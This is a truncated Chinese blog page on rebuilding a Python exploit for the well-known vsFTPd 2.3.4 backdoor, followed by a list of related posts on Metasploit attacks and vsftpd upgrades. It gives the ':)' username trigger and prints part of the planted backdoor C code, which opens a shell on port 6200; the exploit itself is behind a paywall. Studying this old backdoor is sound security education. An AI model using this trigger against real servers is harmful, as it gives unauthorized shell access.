Python学习之重构vsFTPd后门漏洞详解

最新推荐文章于 2021-12-26 15:33:49 发布
原创 最新推荐文章于 2021-12-26 15:33:49 发布 · 992 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了如何用Python重构vsFTPd 2.3.4的后门漏洞exploit,详细讲解了触发漏洞的条件及exploit的编写过程,包括连接shell、处理命令行参数和实现shell交互。通过实例演示了exploit的使用,并提醒注意Python代码中制表符的使用规范。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

大家好,首先来个声明本文目的不在于分析vsFTPd后门漏洞,我最近喜欢用漏洞编写exploit的形式来练习编程语言,在本文中,我们将重新用Python语言来一步步的编写这个漏洞的利用程序,主要是触发后门然后连接shell。首先我们来了解一下这个漏洞是如何触发的。

  0×02 剖析vsFTPd后门漏洞

  这个漏洞比较老了,但是要当成一个例子来练习技术,非常的经典,洞如其名,不知道这个是不是程序员故意留下的,还是被黑客植入的。首先我们下载源码下来看看。

  在str.c源码中,我们发现多了一行很可疑的代码:

  else if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29))

  {

  vsf_sysutil_extra();

  }

  0x3a和0×29是16进制编码,我们转换成10进制再转换成字符就是 : 和 ) 。从上面的代码中很容易看出,只要我们输入的用户名字符串中有一位字符是 : ,下一位字符是 ) 就可以执行函数vsf_sysutil_extra() 。

  在sysdeputil.c的源码中,我们找到了 vsf_sysutil_extra() 函数:

  int vsf_sysutil_extra(void)

  {

  int fd, rfd;

  struct sockaddr_in sa;

  if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0)

  exit(1);

  memset(&sa, 0, sizeof(sa));

  sa.sin_family = AF_INET;

  sa.sin_port = htons(6200);

  sa.sin_addr.s_addr = INADDR_ANY;

  if((bind(fd,(struct sockaddr *)&sa,

  sizeof(struct sockaddr))) < 0)&nbs

最低0.47元/天 解锁文章

200万优质内容无限畅学
qq_32506555
关注
FTP后门漏洞复现(含有漏洞vsftpd2.3.4)
顾蒅' Home
09-12 7483
FTP后门漏洞复现 0x01 漏洞简述 vsftpd-2.3.4 手工触发漏洞:当进行FTP认证时,如果用户名USER中包含:),那么直接就触发监听6200端口的连接的shell。 0x02 风险等级 漏洞评定结果如下: 评定方式 等级 威胁等级 严重 影响面 广泛 0x03 漏洞详情 FTP是文件传输协议(File Transfer Protocol)的缩写,是用于在网络上进行文件传输的一套标准协议,它工作在 OSI 模型的第七层, TCP 模型的第四层, 即应用层, 使用 TCP 传输
漏洞挖掘和利用_使用网络扫描工具搜索vsftpd ftp服务器程序的相关工具和攻击载荷,搜索出vsftpd ft
最新发布
m0_54903333的博客
04-11 897
快速浏览一下网页,进入“Extensions”-“User Defined Tags”,按照步骤要求设置用户名和代码,设置完成后,单击 Submit 按钮提交。
vsftpd 3.0.2的一些问题(无法开启服务、无法正常显示文件等功能)
Insupport的博客
08-27 3663
关于vsftpd3.0.2正常安装配置关于我遇到的无法启动服务或外部客户端无法连接的问题: [root@www ~]# systemctl start vsftpd.service Job for vsftpd.service failed because the control process exited with error code. See "systemctl status vsftpd.service" and "journalctl -xe" for details. [root@www ~
ftp之vsftpd使用过程遇到的坑
予挚之的博客
09-02 4153
需求:被动模式访问ftp,用户只能访问该用户家目录里面的内容,不能切换除用户目录之外的目录 另外,win 下推荐几个 ftp(sftp)工具 1.Freeftp(功能:ftp+sftp; 小白最适用,简单、适用于对权限无要求的情况) 2.FireZilla(功能:ftp;能对用户权限和目录权限做详细配置) 3.Titan ftp(功能:ftp+sftp 等等,功能全面,了解使用需要一定时间) 一、安装与启动vsftpd 1.1 安装vsftpd yum install -y vsftpd
vsftpd FTP Server lsc远程拒绝服务漏洞
07-03
vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全的FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
vsftp3.0.4适用于el7(centos7.x),规避3.0.2版本的漏洞
03-01
1) 上传包到服务器安装路径 vsftpd-v3.0.4-centos7.zip 2) 解压: unzip vsftpd-v3.0.4-centos7.zip 3) 备份配置文件: cp /etc/vsftpd/vsftpd.conf /etc/vsftpd/vsftpd.conf.bak 4) 如果运行了vsftpd,则先停止: systemctl stop vsftpd 5) 安装升级vsftpd 3.0.4 rpm -Uvh vsftpd-3.0.4-1.el7.x86_64.rpm rpm -Uvh vsftpd-sysvinit-3.0.4-1.el7.x86_64.rpm 6) 启动vsftpd: systemctl start vsftpd 7) 验证版本信息: vsftpd –v 8) 验证服务可用 使用SSH工具,可以使用ftp协议访问 或者在文件中,外部系统正常的往系统内写入文件
vsftpd配置文件详解
09-30
vsftpd是一个非常流行的FTP服务器软件,它以安全性高而著称。vsftpd的配置主要通过编辑一个叫做vsftpd.conf的配置文件来实现,这个文件位于/etc/vsftpd目录下。下面将详细解释配置文件中的各种设置选项及其含义。 1...
史上最详细的vsftpd配置文件详解
09-30
vsftpd作为一个主打安全的FTP服务器,有很多的选项设置。下面介绍了vsftpd的配置文件列表,而所有的配置都是基于vsftpd.conf这个配置文件的。本文将提供完整的vsftpd.conf的中文说明
最全面的vsftpd配置文件详解
01-10
最详细的vsftpd配置文件,分享给大家。 注意: 使用匿名登入时,所登入的目录。默认值为/var/ftp。注意ftp目录不能是777的权限属性,即匿名用户的家目录不能有777的权限。 对于用户的访问控制可以通过/etc/vsftpd...
CentOS6.4下vsftpd-2.2.2-11遇到的问题
weixin_34102807的博客
04-03 337
553couldnotcreatefile输入如下命令:getsebool-a|grepftpd返回:allow_ftpd_anon_write-->offallow_ftpd_full_access-->offallow_ftpd_use_cifs-->offallow_ftpd_use_nfs-->offftpd_co...
vsftpd-3.0.2-22.el7.x86_64.rpm
08-19
vsftpd-3.0.2-22.el7.x86_64.rpm 官方网站下载 亲测能用
centos升级vsftp3.0.2
03-05
centos升级vsftp3.0.2步骤详解以及出现问题的解决办法
vsftpd-2.2.2-24.el6.x86_64 linux中vsftp
04-26
下载后解压后上传都服务器上,使用rpm -ivh 包名,便可安装
vsftpd 2.3.4 带漏洞版本 可复现
09-26
vsftpd 2.3.4 带笑脸漏洞版本 可复现
修复VSFTPD漏洞——版本升级
ᠰᡝᠪᠵᡝᠨ的博客
12-26 5781
文章目录第一步:备份相关文件第二步:编译安装新版本的VSFTPD第三步:将编译完成后的文件拷贝到该去的地方第四步:修改service文件其它:配置文件主要配置升级过程中遇到的问题完整地service文件 第一步:备份相关文件 mkdir vsftpd-bak #创建目录,用来做配置文件备份 cd vsftpd-bak/ cp -R /etc/vsftpd ./vsftpdbak`date +%F-%T` #备份全部的配置文件 cp /etc/rc.d/init.d/vsftpd ./vsftpd.ser
metasploit利用vsftpd漏洞获取root权限
weixin_34268579的博客
09-28 455
2019独角兽企业重金招聘Python工程师标准>>> ...
简单的metasploit使用,vsftpd漏洞利用
花儿与少年的博客
09-20 7398
先扫描主机开启的服务和端口及版本号,存在误报 看到有个vsftpd2.0.8,据说2.3.4存在后门漏洞,没这个好运气扫到,就简单的练习下流程 下面利用metasploit实施攻击过程,进入metasploit命令行命令为:msfconsole,search vsftpd,搜索有关vsftpd的相关工具和攻击载荷。查找结果如下: 设置好参数后,run运行即可,(会话未创建no s...
metasploitable2渗透:Metasploit攻击VSFTPD2.3.4后门漏洞
qq_43054896的博客
03-25 2608
攻击机 kali:192.168.88.147 靶机 metasploitable2:192.168.88.135 一、主机探测,信息收集 1、利用masscan进行主机端口扫描 使用masscan主要是为了进行快速扫描,查看目标主机metasploitable是否在线,开放端口有哪些 masscan -p 0-65535 --rate 100000 192.168.88.135 根据开放...
CentOS6安装vsftpd解决ls.c时存在远程拒绝服务漏洞
03-02 1279
今天漏洞扫描出来一个漏洞vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全的FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。 因为是老机子了,又没办法重新安装,只好升级vsftpd到最新版本2.3.4,下载了一个vsftpd-2.3.4 ,直接make不过去,各种不适应,报错,我简单梳理了一下 1、首先类文件需要复制一下 cp /lib64/libcap.so.1 /lib/l
vsftpd漏洞利用
09-03
- *2* [Python学习重构vsFTPd后门漏洞详解](https://blog.csdn.net/qq_32506555/article/details/54604194)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值